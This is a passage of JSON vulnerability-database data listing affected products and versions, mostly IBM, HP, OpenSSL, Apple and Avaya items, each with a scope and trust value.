        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "56003"
      },
      {
        "model": "sterling connect:enterprise http option",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3"
      },
      {
        "model": "storage provisioning manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.2.2"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.0.0"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.1"
      },
      {
        "model": "hp-ux b.11.23",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "malware analysis appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "4.1.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.2.0"
      },
      {
        "model": "vcenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "9.3"
      },
      {
        "model": "systems director common agent for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.1"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.1"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.1.2"
      },
      {
        "model": "cognos planning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "tivoli workload scheduler for applications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2"
      },
      {
        "model": "flex system chassis management module 1.20.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2"
      },
      {
        "model": "sterling connect:express for unix ifix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6.1146-108"
      },
      {
        "model": "aspera enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.5.1"
      },
      {
        "model": "security virtual server protection for vmware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "insight control server provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "insight control server provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.0"
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "project openssl 1.0.0e",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "mac os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.2"
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "project openssl beta1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0"
      },
      {
        "model": "storage provisioning manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.2"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "packetshaper",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "9.2.10"
      },
      {
        "model": "system management homepage",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.5"
      },
      {
        "model": "business server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "1x8664"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.1.0"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3"
      },
      {
        "model": "ssl for openvms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.4"
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "aspera shares",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.7.3"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.10"
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "cognos insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1.2"
      },
      {
        "model": "aura collaboration environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "insight control server deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1.2"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.1"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8x"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "cloudsystem foundation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.1"
      },
      {
        "model": "storage provisioning manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.3.2"
      },
      {
        "model": "ps110",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "upward integration modules hardware management pack",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.5.3"
      },
      {
        "model": "aspera point to point",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.5.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.33"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2.1"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3"
      },
      {
        "model": "initiate master data service provider hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "packetshaper s-series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "11.2"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.3.0"
      },
      {
        "model": "upward integration modules integrated installer",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.5.3"
      },
      {
        "model": "insight control server deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.3"
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.3"
      },
      {
        "model": "project openssl 0.9.8t",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "splunk",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "6.0.7"
      },
      {
        "model": "tivoli netcool/system service monitor fp8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.1.0"
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "flex system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70000"
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "imc uam e0302p07",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2.3"
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.6"
      },
      {
        "model": "secure global desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.71"
      },
      {
        "model": "switch series (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10500v7)0"
      },
      {
        "model": "aspera faspex",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.7.5"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.2.1"
      },
      {
        "model": "project openssl 1.0.0c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.0.0"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1"
      },
      {
        "model": "qradar vulnerability manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.3"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "8.0"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.2.0"
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "systems director common agent for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.1"
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "cloudsystem matrix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.3"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.8.1.0"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2.1"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6"
      },
      {
        "model": "ra",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "tuxedo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.1.1.0"
      },
      {
        "model": "proxysg sgos",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.5.6.1"
      },
      {
        "model": "security analytics platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.6"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.1.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.4"
      },
      {
        "model": "rf manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.9.0"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.04"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.6.0"
      },
      {
        "model": "cognos planning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "project openssl 1.0.0f",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "tivoli management framework",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.1"
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "cloudsystem matrix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "packetshaper s-series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "11.1"
      },
      {
        "model": "h.07",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "infosphere master data management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.3"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.1.1"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "tivoli netcool/system service monitor fp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "ssl for openvms",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.4-495"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.12"
      },
      {
        "model": "proxysg sgos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.5"
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "cognos insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.2.2"
      },
      {
        "model": "office connect pm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "18100"
      },
      {
        "model": "project openssl 1.0.0j",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "project openssl 1.0.0b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.1"
      },
      {
        "model": "content analysis system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.1"
      },
      {
        "model": "ya",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "switch series r2311p05",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5900"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3"
      },
      {
        "model": "bladecenter t advanced management module 32r0835",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "msm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.26.2.1.2"
      },
      {
        "model": "bladesystem c-class onboard administrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.30"
      },
      {
        "model": "cloudsystem enterprise software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.1"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.3.0"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.0"
      },
      {
        "model": "lotus protector for mail security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.80"
      },
      {
        "model": "ssl for openvms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.4-471"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0"
      },
      {
        "model": "cacheflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "2.2"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "initiate master data service provider hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5"
      },
      {
        "model": "12500(comware r7328p04",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "v7)"
      },
      {
        "model": "aura presence services sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "infosphere information server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "aura presence services sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "aspera console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "2.0.1"
      },
      {
        "model": "systems director common agent for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.3"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.3"
      },
      {
        "model": "tivoli netcool/system service monitor fp9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.3.2"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.0"
      },
      {
        "model": "systems director common agent for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.4"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.5"
      },
      {
        "model": "w",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1.1"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1.2"
      },
      {
        "model": "hp-ux b.11.31",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "content analysis system software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.1.1.1"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "lotus protector for mail security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.8.1.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.7.0"
      },
      {
        "model": "project openssl beta3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "6.0.2"
      },
      {
        "model": "project openssl f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "bladecenter -t",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8730"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "cloudbridge",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "tivoli netcool/system service monitor fp5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.6"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.3"
      },
      {
        "model": "version control repository manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "pb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "nextscale n1200 enclosure fan power controller fhet13a-2.00",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.2"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.0"
      },
      {
        "model": "tivoli workload scheduler for applications fp01",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "msm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.56.5.1.0"
      },
      {
        "model": "initiate master data service patient hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "flex system chassis management module 1.1.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.3"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "upward integration modules for microsoft system center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.5"
      },
      {
        "model": "project openssl 1.0.1d",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.9"
      },
      {
        "model": "bladecenter -h",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7989"
      },
      {
        "model": "rational software architect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.10"
      },
      {
        "model": "flex system fc3171 8gb san switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.2"
      },
      {
        "model": "project openssl beta1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "bladecenter -ht",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8740"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.5"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.1.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.2"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0.4"
      },
      {
        "model": "cacheflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "2.0"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.4"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "infosphere information server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "cognos controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "cognos controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "aspera console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "2.3"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "aspera faspex",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.7.7"
      },
      {
        "model": "xcode",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0"
      },
      {
        "model": "switch series r2111p06",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "11900"
      },
      {
        "model": "imc uam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0.5"
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.8"
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": "eq",
